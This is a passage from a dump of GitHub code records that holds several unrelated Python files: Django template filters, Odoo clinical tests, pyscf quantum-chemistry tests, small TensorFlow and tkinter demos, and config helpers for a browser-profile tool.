video_reader.release()\n","repo_name":"yathartha3/Modified-YOLO-for-relative-pose-estimation","sub_path":"evaluate_model_pose_outputs.py","file_name":"evaluate_model_pose_outputs.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41127811200","text":"import tensorflow as tf\n\ntf.compat.v1.disable_eager_execution()\n\nx1 = tf.constant(5)\nx2 = tf.constant(6)\n\nresult = tf.multiply(x1,x2)\n\nprint(result)\n\nsess = tf.compat.v1.Session()\nprint(sess.run(result))\nsess.close()","repo_name":"MM150551/Machine_learning_Testing","sub_path":"TensorFlowtut1.py","file_name":"TensorFlowtut1.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2120941569","text":"\"\"\"The filters used in eusay templates\"\"\"\nimport re\nimport markdown\nimport bleach\nimport datetime\nimport random\n\nfrom django.template.loader import render_to_string\nfrom django.template.defaultfilters import stringfilter, pluralize\nfrom django.utils.safestring import mark_safe\nfrom django import template\nfrom django.conf import settings\n\nfrom votes.models import Vote\nfrom core.utils import smart_truncate as core_smart_truncate\n\nregister = template.Library()\n\n\n@register.filter\ndef comment_user_vote(comment, user):\n \"\"\"Get the vote, or lack thereof, of ``user`` on ``comment``\n\n :returns: The vote of ``user`` on ``comment`` as ``0`` for no vote, ``-1``\n for down vote and ``1`` for up vote\n :rtype: integer\n\n \"\"\"\n try:\n vote = comment.votes.get(user=user)\n except Vote.DoesNotExist:\n vote = None\n if not vote:\n user_vote = 0\n elif vote.isVoteUp:\n user_vote = 1\n else:\n user_vote = -1\n return render_to_string('comment_votes.html', {'comment': comment,\n 'user_vote': user_vote})\n\n\n@register.filter\ndef comment_replies(comment):\n \"\"\"Get the replies to ``comment``\n\n :returns: Replies to ``comment`` sorted chronologically\n :rtype: QuerySet\n\n \"\"\"\n return comment.get_replies(sort=\"chronological\")\n\n\n@register.filter(is_safe=True)\n@stringfilter\ndef my_markdown(text):\n \"\"\"Custom markdown filter\n\n :param text: Text to render as markdown\n :returns: ``text`` rendered to markdown\n :rtype: string\n\n \"\"\"\n extensions = [\"nl2br\", ]\n html = markdown.markdown(text, extensions=extensions)\n linkified = bleach.linkify(html)\n allowed_tags = bleach.ALLOWED_TAGS\n allowed_tags.append(\"ins\")\n allowed_tags.append(\"del\")\n cleaned_text = bleach.clean(linkified, strip_comments=False,\n tags=allowed_tags)\n return mark_safe(cleaned_text)\n\n\n@register.filter(name=\"timesince_human\")\ndef humanize_timesince(date):\n \"\"\"Converts ``date`` to a human readable string describing the time since\n\n :param date: Date to convert\n :returns: Time since string\n :rtype: string\n\n \"\"\"\n delta = datetime.datetime.now() - date\n\n num_years = delta.days // 365\n if num_years > 0:\n return u\"%d year%s ago\" % (num_years, pluralize(num_years))\n\n num_weeks = delta.days // 7\n if num_weeks > 0:\n return u\"%d week%s ago\" % (num_weeks, pluralize(num_weeks))\n\n if delta.days > 0:\n return u\"%d day%s ago\" % (delta.days, pluralize(delta.days))\n\n num_hours = delta.seconds // 3600\n if num_hours > 0:\n return u\"%d hour%s ago\" % (num_hours, pluralize(num_hours))\n\n num_minutes = delta.seconds // 60\n if num_minutes > 0:\n return u\"%d minute%s ago\" % (num_minutes, pluralize(num_minutes))\n\n return u\"a few seconds ago\"\n\n\n@register.filter\ndef smart_time(date):\n \"\"\"Creates string describing ``date`` depending on relation to current\n time - hour and minute if ``date`` is today, day and month if ``date`` is\n this year and day, month and year if ``date`` was before this year.\n\n :rtype: string\n\n \"\"\"\n delta = datetime.datetime.now() - date\n\n num_years = delta.days // 365\n if num_years > 0:\n return date.strftime(\"%d %b, %Y\")\n\n elif date.date() != datetime.date.today():\n return date.strftime(\"%d %b\")\n\n else:\n return date.strftime(\"%H:%M\")\n\n\n@register.filter\ndef smart_truncate(text):\n \"\"\"\n Simply a filter for the smart_truncate function in core.utils\n :param text: the text to be truncated\n :rtype: string\n \"\"\"\n return core_smart_truncate(text)\n","repo_name":"HughMcGrade/eusay","sub_path":"core/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"574083966","text":"from openerp.tests.common import TransactionCase\n\n\nmocked_print_called = 0\n\n\nclass SettingsPoolMockBrowse(object):\n\n def __init__(self):\n self.locations_to_print = []\n\n\nclass TestUpdateFlags(TransactionCase):\n \"\"\"\n Test that the report_printed flag is updated by observations being\n taken and reports being printed\n \"\"\"\n\n def setUp(self):\n super(TestUpdateFlags, self).setUp()\n self.test_utils = self.env['nh.clinical.test_utils']\n self.spell_model = self.env['nh.clinical.spell']\n self.location_model = self.env['nh.clinical.location']\n self.ews_model = self.env['nh.clinical.patient.observation.ews']\n self.test_utils.admit_and_place_patient()\n self.patient_id = self.test_utils.patient.id\n\n def test_flag_changed_by_observation_complete(self):\n \"\"\"\n Test that the report_printed flag is set to False on completing\n an EWS observation\n \"\"\"\n spell = self.spell_model.browse(\n self.spell_model.get_by_patient_id(\n self.patient_id\n )\n )\n spell.write({'report_printed': True})\n self.assertEqual(spell.report_printed, True,\n 'Flag not set correctly by write method')\n self.test_utils.create_and_complete_ews_obs_activity(\n self.patient_id, spell.id)\n self.assertEqual(spell.report_printed, False,\n 'Flag not updated by complete method properly')\n\n # def test_04_test_flag_changed_by_report_printing_method(self):\n # # complete an observation and check flag is now False\n # cr, uid = self.cr, self.uid\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # ews_activity_id = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id},\n # {'patient_id': self.patient_id})\n # self.ews_pool.submit(cr, uid, ews_activity_id, self.ews_data)\n # self.ews_pool.complete(cr, uid, ews_activity_id)\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method properly')\n #\n # # run the report printing method in api and check that the\n # # flag is set to True\n # self.api_pool.print_report(cr, uid, spell_id)\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n #\n # def test_05_test_flag_changed_by_printing_method_no_spell_defined(self):\n # # complete an observation and check flag is now False\n # cr, uid = self.cr, self.uid\n # # clean up before test\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [['report_printed', '=', False]])\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids, {'report_printed': True})\n #\n # # add demo data\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # spell_id2 = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id2)\n # ews_activity_id = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id},\n # {'patient_id': self.patient_id}\n # )\n # ews_activity_id2 = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id2},\n # {'patient_id': self.patient_id2}\n # )\n # self.ews_pool.submit(cr, uid, ews_activity_id, self.ews_data)\n # self.ews_pool.complete(cr, uid, ews_activity_id)\n # self.ews_pool.submit(cr, uid, ews_activity_id2, self.ews_data2)\n # self.ews_pool.complete(cr, uid, ews_activity_id2)\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method properly')\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete '\n # 'method properly on second report')\n #\n # # run the report printing method in api and check\n # # that the flag is set to True\n # self.api_pool.print_report(cr, uid)\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n #\n # def test_06_test_flag_not_change_by_wkhtmltopdf_error(self):\n # # complete an observation and check flag is now False\n # cr, uid = self.cr, self.uid\n #\n # def mock_print(*args, **kwargs):\n # global mocked_print_called\n # mocked_print_called += 1\n # if mocked_print_called == 2:\n # raise osv.except_osv(\n # 'Report (PDF)',\n # 'Wkhtmltopdf failed (error code: -11). Message:'\n # )\n # return mock_print.origin(*args, **kwargs)\n #\n # self.registry('report')._patch_method('_run_wkhtmltopdf', mock_print)\n # # clean up before test\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [['report_printed', '=', False]])\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids, {'report_printed': True})\n #\n # # add demo data\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # spell_id2 = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id2)\n # spell_id3 = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id3)\n # ews_activity_id = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id},\n # {'patient_id': self.patient_id}\n # )\n # ews_activity_id2 = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id2},\n # {'patient_id': self.patient_id2}\n # )\n # ews_activity_id3 = self.ews_pool.create_activity(\n # cr, uid,\n # {'parent_id': self.spell_id3},\n # {'patient_id': self.patient_id3}\n # )\n # self.ews_pool.submit(cr, uid, ews_activity_id, self.ews_data)\n # self.ews_pool.complete(cr, uid, ews_activity_id)\n # self.ews_pool.submit(cr, uid, ews_activity_id2, self.ews_data2)\n # self.ews_pool.complete(cr, uid, ews_activity_id2)\n # self.ews_pool.submit(cr, uid, ews_activity_id3, self.ews_data2)\n # self.ews_pool.complete(cr, uid, ews_activity_id3)\n #\n # # Test that all false\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method properly')\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete method '\n # 'properly on second report')\n # pre_report_value = self.spell_pool.read(\n # cr, uid, spell_id3, ['report_printed'])['report_printed']\n # self.assertEqual(pre_report_value, False,\n # 'Flag not updated by complete '\n # 'method properly on second report')\n #\n # # run the report printing method in api and check that the flag\n # # is set to True\n # self.api_pool.print_report(cr, uid)\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id2, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, False,\n # 'Flag not updated by printing method properly')\n # post_report_value = self.spell_pool.read(\n # cr, uid, spell_id3, ['report_printed'])['report_printed']\n # self.assertEqual(post_report_value, True,\n # 'Flag not updated by printing method properly')\n #\n # # Test that only failed spell is returned for printing\n # new_dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [['report_printed', '=', False]])\n # self.assertEqual(\n # new_dirty_spell_ids, [spell_id2],\n # 'Spells returned post failed print not correct')\n #\n # self.registry('report')._revert_method('_run_wkhtmltopdf')\n #\n # def test_07_test_no_spell_domain_is_empty_when_no_non_\n # printed_spells(self):\n # cr, uid = self.cr, self.uid\n # loc_ids = self.location_pool.search(\n # cr, uid, [\n # ['usage', '=', 'ward'],\n # ['backup_observations', '=', True]\n # ]\n # )\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids, {'report_printed': True})\n #\n # test_empty = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # self.assertEqual(\n # test_empty, [],\n # 'No Spell Domain returned spells when should be empty')\n #\n # def test_08_test_no_spell_domain_is_empty_when_no_non_\n # printed_spells(self):\n # cr, uid = self.cr, self.uid\n # loc_ids = self.location_pool.search(\n # cr, uid, [\n # ['usage', '=', 'ward'],\n # ['backup_observations', '=', True]\n # ]\n # )\n # dirty_spell_ids = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # test_spell = dirty_spell_ids[0]\n # self.spell_pool.write(\n # cr, uid, dirty_spell_ids[1:], {'report_printed': True})\n #\n # test_empty = self.spell_pool.search(\n # cr, uid, [\n # ['report_printed', '=', False],\n # ['state', 'not in', ['completed', 'cancelled']],\n # ['location_id', 'child_of', loc_ids]\n # ]\n # )\n # self.assertEqual(\n # test_empty, [test_spell],\n # 'No Spell Domain returned more than one spell')\n #\n # def test_09_test_report_added_to_database(self):\n # # run the report printing method in api and check that report\n # # added to DB\n # cr, uid = self.cr, self.uid\n # attachment_id = self.api_pool.add_report_to_database(\n # cr, uid,\n # 'nh.clinical.observation_report',\n # 'test_data',\n # 'test_report.pdf',\n # 'nh.clinical.observation_report_wizard',\n # 1\n # )\n #\n # attachment_data = self.ir_pool.read(\n # cr, uid, attachment_id, ['datas'])[0]['datas']\n # report_str = base64.decodestring(attachment_data)\n #\n # self.assertEqual(\n # report_str, 'test_data', 'Report not added to database properly')\n #\n # def test_10_test_report_added_to_file_system(self):\n # # run the report printing method in api and check that file\n # # was created on FS\n # # /bcp/out\n # self.api_pool.add_report_to_backup_location('/bcp/out',\n # 'test_data',\n # 'test_report')\n # with open('/bcp/out/test_report.pdf', 'r') as report_file:\n # file_content = report_file.read()\n # self.assertEqual(\n # file_content,\n # 'test_data',\n # 'Report not added to filesystem properly'\n # )\n #\n # def test_11_test_report_filename_is_correct(self):\n # # run the report pringing method in teh api and\n # # check that the file is correctly named\n # # ward_surname_nhs_number\n # cr, uid = self.cr, self.uid\n # spell_id = self.spell_pool.get_by_patient_id(\n # cr, uid, self.patient_id)\n # nhs_number = '1231231231'\n # ward = None\n # surname = 'Wren'\n # file_name = '{w}_{s}_{n}'.format(w=ward, s=surname, n=nhs_number)\n #\n # # do print_report\n # self.api_pool.print_report(cr, uid, spell_id)\n # # check backup file name\n # backup_exists = os.path.isfile('/bcp/out/{0}.pdf'.format(file_name))\n # self.assertEqual(\n # backup_exists, True, 'Report incorrectly named on file system')\n #\n # def test_12_test_general_settings_view_updated_with_options(self):\n # # Grab the view XML and make sure it has the overridden values\n # cr, uid = self.cr, self.uid\n # view_pool = self.registry('ir.ui.view')\n # parent_view_id = view_pool.search(\n # cr, uid, [\n # ['model', '=', 'base.config.settings'],\n # ['mode', '=', 'primary']\n # ]\n # )[0]\n # child_view_ids = view_pool.read(\n # cr, uid,\n # parent_view_id,\n # ['inherit_children_ids']\n # )['inherit_children_ids']\n # our_view_id = view_pool.search(\n # cr, uid, [['name', '=', 'base.config.settings.nhclinical']])[0]\n # self.assertTrue(\n # our_view_id in child_view_ids,\n # 'View not in list of inherited views for general\n # settings screen')\n #\n # def test_13_test_gen_settings_loads_backup_enabld_wards_correctly(self):\n # # Using the demo ward call the function to load the data\n # cr, uid = self.cr, self.uid\n # settings_pool = self.registry('base.config.settings')\n # get_vals = settings_pool.get_default_all(cr, uid, [])\n # self.assertEqual(\n # get_vals['locations_to_print'][0],\n # self.wu_id,\n # 'Ward U id not in location to print from settings')\n #\n # def test_14_gen_settings_set_location_removes_all_\n # wards_not_defined(self):\n # cr, uid = self.cr, self.uid\n # settings_pool = self.registry('base.config.settings')\n # record = settings_pool.create(cr, uid, {'locations_to_print': []})\n # settings_pool.set_locations(cr, uid, [record])\n # get_vals = settings_pool.get_default_all(cr, uid, [])\n # self.assertEqual(\n # get_vals['locations_to_print'],\n # [], 'Ward U not removed from backed up wards')\n","repo_name":"Jdog1956/Open-eObs","sub_path":"nh_eobs_backup/tests/test_update_flag.py","file_name":"test_update_flag.py","file_ext":"py","file_size_in_byte":15957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30967420270","text":"def cry(m,t):\n\td = len(m)\n\tn = len(t)\n\n\t# Initialize memo table\n\tmemo = [[0 for j in range(n+1)] for i in range(d+1)]\n\n\t# Base case\n\tfor book in range(n+1):\n\t\tmemo[d][book] = sum(t[book:])\n\tfor day in range(d+1):\n\t\tmemo[day][n] = sum([F**4 for F in m[day:]])\n\n\tfor i in range(d-1,-1,-1):\n\t\tfor j in range(n-1,-1,-1):\n\t\t\ttears = []\n\t\t\tfor k in range(1,n-j+1):\n\t\t\t\tFi = max(m[i] - sum(t[j:j+k]), 0)\n\t\t\t\tSi = max(sum(t[j:j+k])- m[i], 0)\n\t\t\t\ttear = Fi**4 + Si\n\t\t\t\ttears.append(tear + memo[i+1][j+k])\n\t\t\tmemo[i][j] = min(tears)\n\t\n\treturn memo[0][0]\n","repo_name":"matthhong/sketches","sub_path":"cry.py","file_name":"cry.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45962459524","text":"#!/usr/bin/env python\nfrom pyscf import scf, mp, cc\nimport dchf\n\nimport numpy\n\nimport unittest\nfrom numpy import testing\nfrom test_common import helium_chain, hydrogen_dimer_chain\n\n\ndef assign_chain_domains(dchf, domain_size, buffer_size, reset_dm=True):\n \"\"\"\n Assigns domains given the size of the domain core region and buffer region.\n Args:\n dchf (dchf.DCHF): divide-conquer Hartree-Fock setup;\n domain_size (int): size of domains' cores;\n buffer_size (int): size of the domains' buffer regions\n reset_dm (bool): resets the density matrix;\n \"\"\"\n if reset_dm:\n dchf.dm = None\n dchf.domains_erase()\n for i in range(0, dchf.__mol__.natm, domain_size):\n dchf.add_domain(numpy.arange(\n max(i - buffer_size, 0),\n min(i + domain_size + buffer_size, dchf.__mol__.natm),\n ), core=numpy.arange(i, min(i + domain_size, dchf.__mol__.natm)))\n\n\nclass HydrogenChainTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n # Solve HF\n cls.h6chain = hydrogen_dimer_chain(6)\n cls.h6mf = scf.RHF(cls.h6chain)\n cls.h6mf.kernel()\n cls.total_energy = cls.h6mf.e_tot - cls.h6mf.energy_nuc()\n cls.dm = cls.h6mf.make_rdm1()\n\n # Solve MP2\n cls.h6mp2 = mp.MP2(cls.h6mf)\n cls.h6mp2.kernel()\n\n # Solve CCSD\n cls.h6ccsd = cc.CCSD(cls.h6mf)\n cls.h6ccsd.kernel()\n\n # Single-domain DCHF\n cls.h6dchf_1 = dchf.DCHF(cls.h6chain)\n assign_chain_domains(cls.h6dchf_1, 6, 0)\n cls.h6dchf_1.kernel(tolerance=1e-10)\n cls.h6dcmp2_1 = dchf.DCMP2(cls.h6dchf_1)\n cls.h6dcmp2_1.kernel()\n cls.h6dcccsd_1 = dchf.DCCCSD(cls.h6dchf_1)\n cls.h6dcccsd_1.kernel()\n\n # Three-domain DCHF\n cls.h6dchf_3 = dchf.DCHF(cls.h6chain)\n assign_chain_domains(cls.h6dchf_3, 2, 2)\n cls.h6dchf_3.kernel(fock_hook=None)\n cls.h6dcmp2_3 = dchf.DCMP2(cls.h6dchf_3)\n cls.h6dcmp2_3.kernel()\n cls.h6dcccsd_3 = dchf.DCCCSD(cls.h6dchf_3)\n cls.h6dcccsd_3.kernel()\n\n def test_fock(self):\n \"\"\"\n Tests the Fock matrix.\n \"\"\"\n a1 = [1, 2]\n a2 = [1, 3, 4]\n testing.assert_allclose(\n self.h6mf.get_fock(dm=self.dm)[self.h6dchf_1.get_block(a1, a2)],\n self.h6dchf_1.get_fock(self.dm, a1, a2),\n atol=1e-14,\n )\n\n def test_orb_energies(self):\n \"\"\"\n Tests exact orbital energies.\n \"\"\"\n e, _ = self.h6dchf_1.get_orbs(self.dm, None)\n testing.assert_allclose(e, self.h6mf.mo_energy, rtol=1e-4)\n\n def test_util(self):\n \"\"\"\n Test utility functions.\n \"\"\"\n t = dchf.DCHF(self.h6chain)\n t.add_domain([0, 1], core=[0, 1])\n with self.assertRaises(ValueError):\n t.domains_cover(r=True)\n\n def test_hf_single_domain(self):\n \"\"\"\n A single-domain HF test.\n \"\"\"\n testing.assert_allclose(self.h6dchf_1.dm, self.dm, atol=1e-6)\n testing.assert_allclose(self.h6dchf_1.hf_energy, self.total_energy, rtol=1e-8)\n\n def test_mp2_single_domain(self):\n \"\"\"\n A single-domain MP2 test.\n \"\"\"\n testing.assert_allclose(self.h6dcmp2_1.e2, self.h6mp2.e_corr, atol=1e-8)\n\n def test_ccsd_single_domain(self):\n \"\"\"\n A single-domain CCSD test.\n \"\"\"\n testing.assert_allclose(self.h6dcccsd_1.e2, self.h6ccsd.e_corr, atol=1e-8)\n\n def test_hf(self):\n \"\"\"\n HF test.\n \"\"\"\n testing.assert_allclose(self.h6dchf_3.dm, self.dm, atol=1e-2)\n testing.assert_allclose(self.h6dchf_3.hf_energy, self.total_energy, rtol=1e-4)\n\n def test_mp2(self):\n \"\"\"\n MP2 test.\n \"\"\"\n testing.assert_allclose(self.h6dcmp2_3.e2, self.h6mp2.e_corr, atol=1e-4)\n\n def test_ccsd(self):\n \"\"\"\n CCSD test.\n \"\"\"\n testing.assert_allclose(self.h6dcccsd_3.e2, self.h6ccsd.e_corr, atol=1e-3)\n\n\nclass HydrogenChain12Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.h12chain = hydrogen_dimer_chain(16)\n cls.h12mf = scf.RHF(cls.h12chain)\n cls.h12mf.kernel()\n\n cls.total_energy = cls.h12mf.e_tot - cls.h12mf.energy_nuc()\n cls.dm = cls.h12mf.make_rdm1()\n\n cls.h12dchf = dchf.DCHF(cls.h12chain)\n\n def test_iter(self):\n \"\"\"\n Tests DCHF iterations.\n \"\"\"\n assign_chain_domains(self.h12dchf, 4, 2)\n e = self.h12dchf.kernel(tolerance=1e-9, fock_hook=None)\n testing.assert_allclose(self.h12dchf.dm, self.dm, atol=1e-2)\n testing.assert_allclose(self.h12mf.e_tot - self.h12chain.energy_nuc(), e, rtol=1e-4)\n\n mp2 = dchf.DCMP2(self.h12dchf)\n mp2.kernel()\n e_ref, _ = mp.MP2(self.h12mf).kernel()\n testing.assert_allclose(e_ref, mp2.e2, atol=1e-4)\n\n\nclass HeliumChainTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.he10chain = helium_chain(10)\n\n cls.he10mf = scf.RHF(cls.he10chain)\n cls.he10mf.kernel()\n cls.he10mp2 = mp.MP2(cls.he10mf)\n cls.he10mp2.kernel()\n\n cls.he10dchf = dchf.DCHF(cls.he10chain)\n assign_chain_domains(cls.he10dchf, 1, 1)\n cls.he10dchf.kernel()\n cls.he10dcmp2 = dchf.DCMP2(cls.he10dchf)\n cls.he10dcmp2.kernel()\n\n def test_results(self):\n testing.assert_allclose(self.he10mf.e_tot, self.he10dchf.e_tot)\n testing.assert_allclose(self.he10mp2.e_corr, self.he10dcmp2.e2)\n","repo_name":"pulkin/local-pyscf","sub_path":"test_dchf.py","file_name":"test_dchf.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13333542137","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : Tk05.py\n# Author: roohom\n# Date : 2018/10/28 0028\n\n# 级联菜单\n\nimport tkinter\n\nbaseFrame = tkinter.Tk()\nbaseFrame.title(\"demo\")\nbaseFrame.geometry(\"300x450+500+150\") # 设置窗口大小及位置,300x450,位置是x:500, y:150\n\nmenuBar = tkinter.Menu(baseFrame)\ntmenuBar = tkinter.Menu(baseFrame)\nfor item in [\"文件\", \"编辑\", \"查看\", \"工具\", \"关于\"]:\n tmenuBar.add_command(label=item)\n\nmenuBar.add_cascade(label=\"刷新\")\nmenuBar.add_cascade(label=\"跳转\", menu=tmenuBar)\n\nbaseFrame[\"menu\"] = menuBar\n\n\nbaseFrame.mainloop()\n","repo_name":"roohom/demo","sub_path":"Tkinter/Tk05.py","file_name":"Tk05.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43616166118","text":"import ruamel.yaml\n\nimport json\nimport os\nfrom pathlib import Path\n\n# 系統存檔主目錄\nSYSTEM_FOLDER_PATH = os.path.join(os.getenv('APPDATA'), 'Socializing')\n# 系統存檔位置\nSYSTEM_CONFIG_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'config.json')\n# 瀏覽器裝置Profile位置\nPROFILE_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserCache')\n# 瀏覽器裝置的設定檔存檔位置\nPROFILE_CONFIG_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserProfile')\n# 瀏覽器裝置的備份檔存檔位置\nPROFILE_BACKUP_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserBackup')\n# 瀏覽器主程式位置\nBROWSER_BIN_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserBin')\n# 瀏覽器主程式位置\nBROWSER_BIN_WIN_PATH = os.path.join(BROWSER_BIN_PATH, 'chrome-win')\n# 日誌位置\nLOG_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'Logs')\n\n# Script位置\nSCRIPT_FOLDER_PATH = os.path.join(SYSTEM_FOLDER_PATH, 'BrowserScript')\n# 腳本列表\nSCRIPT_URL_LIST = [\n \"https://socializing.sakurafb.cc/scripts/facebook.py\",\n \"https://socializing.sakurafb.cc/scripts/facebook_get_profile.py\"\n]\n\n\ndef dict_get(d, keys, default=None):\n \"\"\"\n Get values in dictionary safely.\n https://stackoverflow.com/questions/25833613/safe-method-to-get-value-of-nested-dictionary\n\n Args:\n d (dict):\n keys (str, list): Such as `Scheduler.NextRun.value`\n default: Default return if key not found.\n\n Returns:\n\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if d is None:\n return default\n if not keys:\n return d\n return dict_get(d.get(keys[0]), keys[1:], default)\n\n\ndef dict_set(d, keys, value):\n \"\"\"\n Set value into dictionary safely, imitating deep_get().\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if not keys:\n return value\n if not isinstance(d, dict):\n d = {}\n d[keys[0]] = dict_set(d.get(keys[0], {}), keys[1:], value)\n return d\n\n\ndef dict_merge(old, new):\n for key, value in new.items():\n if isinstance(value, dict):\n if key in old:\n dict_merge(old[key], value)\n else:\n old[key] = value\n else:\n if key not in old:\n old[key] = value\n\n return old\n\n\ndef dict_pop(d, keys, default=None):\n \"\"\"\n Pop value from dictionary safely, imitating deep_get().\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if not isinstance(d, dict):\n return default\n if not keys:\n return default\n elif len(keys) == 1:\n return d.pop(keys[0], default)\n return dict_pop(d.get(keys[0]), keys[1:], default)\n\n\ndef dict_default(d, keys, value):\n \"\"\"\n Set default value into dictionary safely, imitating deep_get().\n Value is set only when the dict doesn't contain such keys.\n \"\"\"\n if isinstance(keys, str):\n keys = keys.split('.')\n assert type(keys) is list\n if not keys:\n if d:\n return d\n else:\n return value\n if not isinstance(d, dict):\n d = {}\n d[keys[0]] = dict_default(d.get(keys[0], {}), keys[1:], value)\n return d\n\n\ndef dict_iter(data, depth=0, current_depth=1):\n \"\"\"\n Iter a dictionary safely.\n\n Args:\n data (dict):\n depth (int): Maximum depth to iter\n current_depth (int):\n\n Returns:\n list: Key path\n Any:\n \"\"\"\n if isinstance(data, dict) \\\n and (depth and current_depth <= depth):\n for key, value in data.items():\n for child_path, child_value in dict_iter(value, depth=depth, current_depth=current_depth + 1):\n yield [key] + child_path, child_value\n else:\n yield [], data\n\n\n# Profile\n\ndef get_profile_config_template():\n return {\n \"index\": 1,\n \"profile\": {\n \"name\": \"default\",\n },\n \"facebook\": {\n \"name\": \"default\",\n \"user_id\": \"\"\n },\n \"tiktok\": {\n \"name\": \"default\",\n \"user_id\": \"\"\n }\n }\n\n\ndef save_profile_config(data):\n \"\"\"存模擬器設定檔(Profile) 至 ./config/profile/\"\"\"\n index = dict_get(data, \"index\")\n os.makedirs(PROFILE_CONFIG_FOLDER_PATH, exist_ok=True)\n config_path = os.path.join(PROFILE_CONFIG_FOLDER_PATH, f'{index}.json')\n\n with open(config_path, \"w\") as f:\n json.dump(data, f, indent=2)\n\n\ndef load_profile_config(index):\n \"\"\"存模擬器設定檔(Profile) 至 ./config/profile/\"\"\"\n\n config_path = os.path.join(PROFILE_CONFIG_FOLDER_PATH, f'{index}.json')\n if os.path.isfile(config_path):\n with open(config_path, \"r\") as f:\n my_data = json.load(f)\n default_data = get_profile_config_template()\n dict_merge(my_data, default_data)\n return my_data\n else:\n mydata = get_profile_config_template()\n mydata['index'] = index\n\n\ndef delete_profile_config(index):\n \"\"\"刪除設定檔\"\"\"\n config_path = os.path.join(PROFILE_CONFIG_FOLDER_PATH, f\"{index}.json\")\n # 檔案路徑\n file = Path(config_path)\n try:\n file.unlink()\n return True\n except OSError as e:\n print(\"Get Error: %s : %s\" % (file, e.strerror))\n\n return False\n\n\n# System\n\ndef get_system_config_template():\n return {\n \"profile\": {\n \"path\": 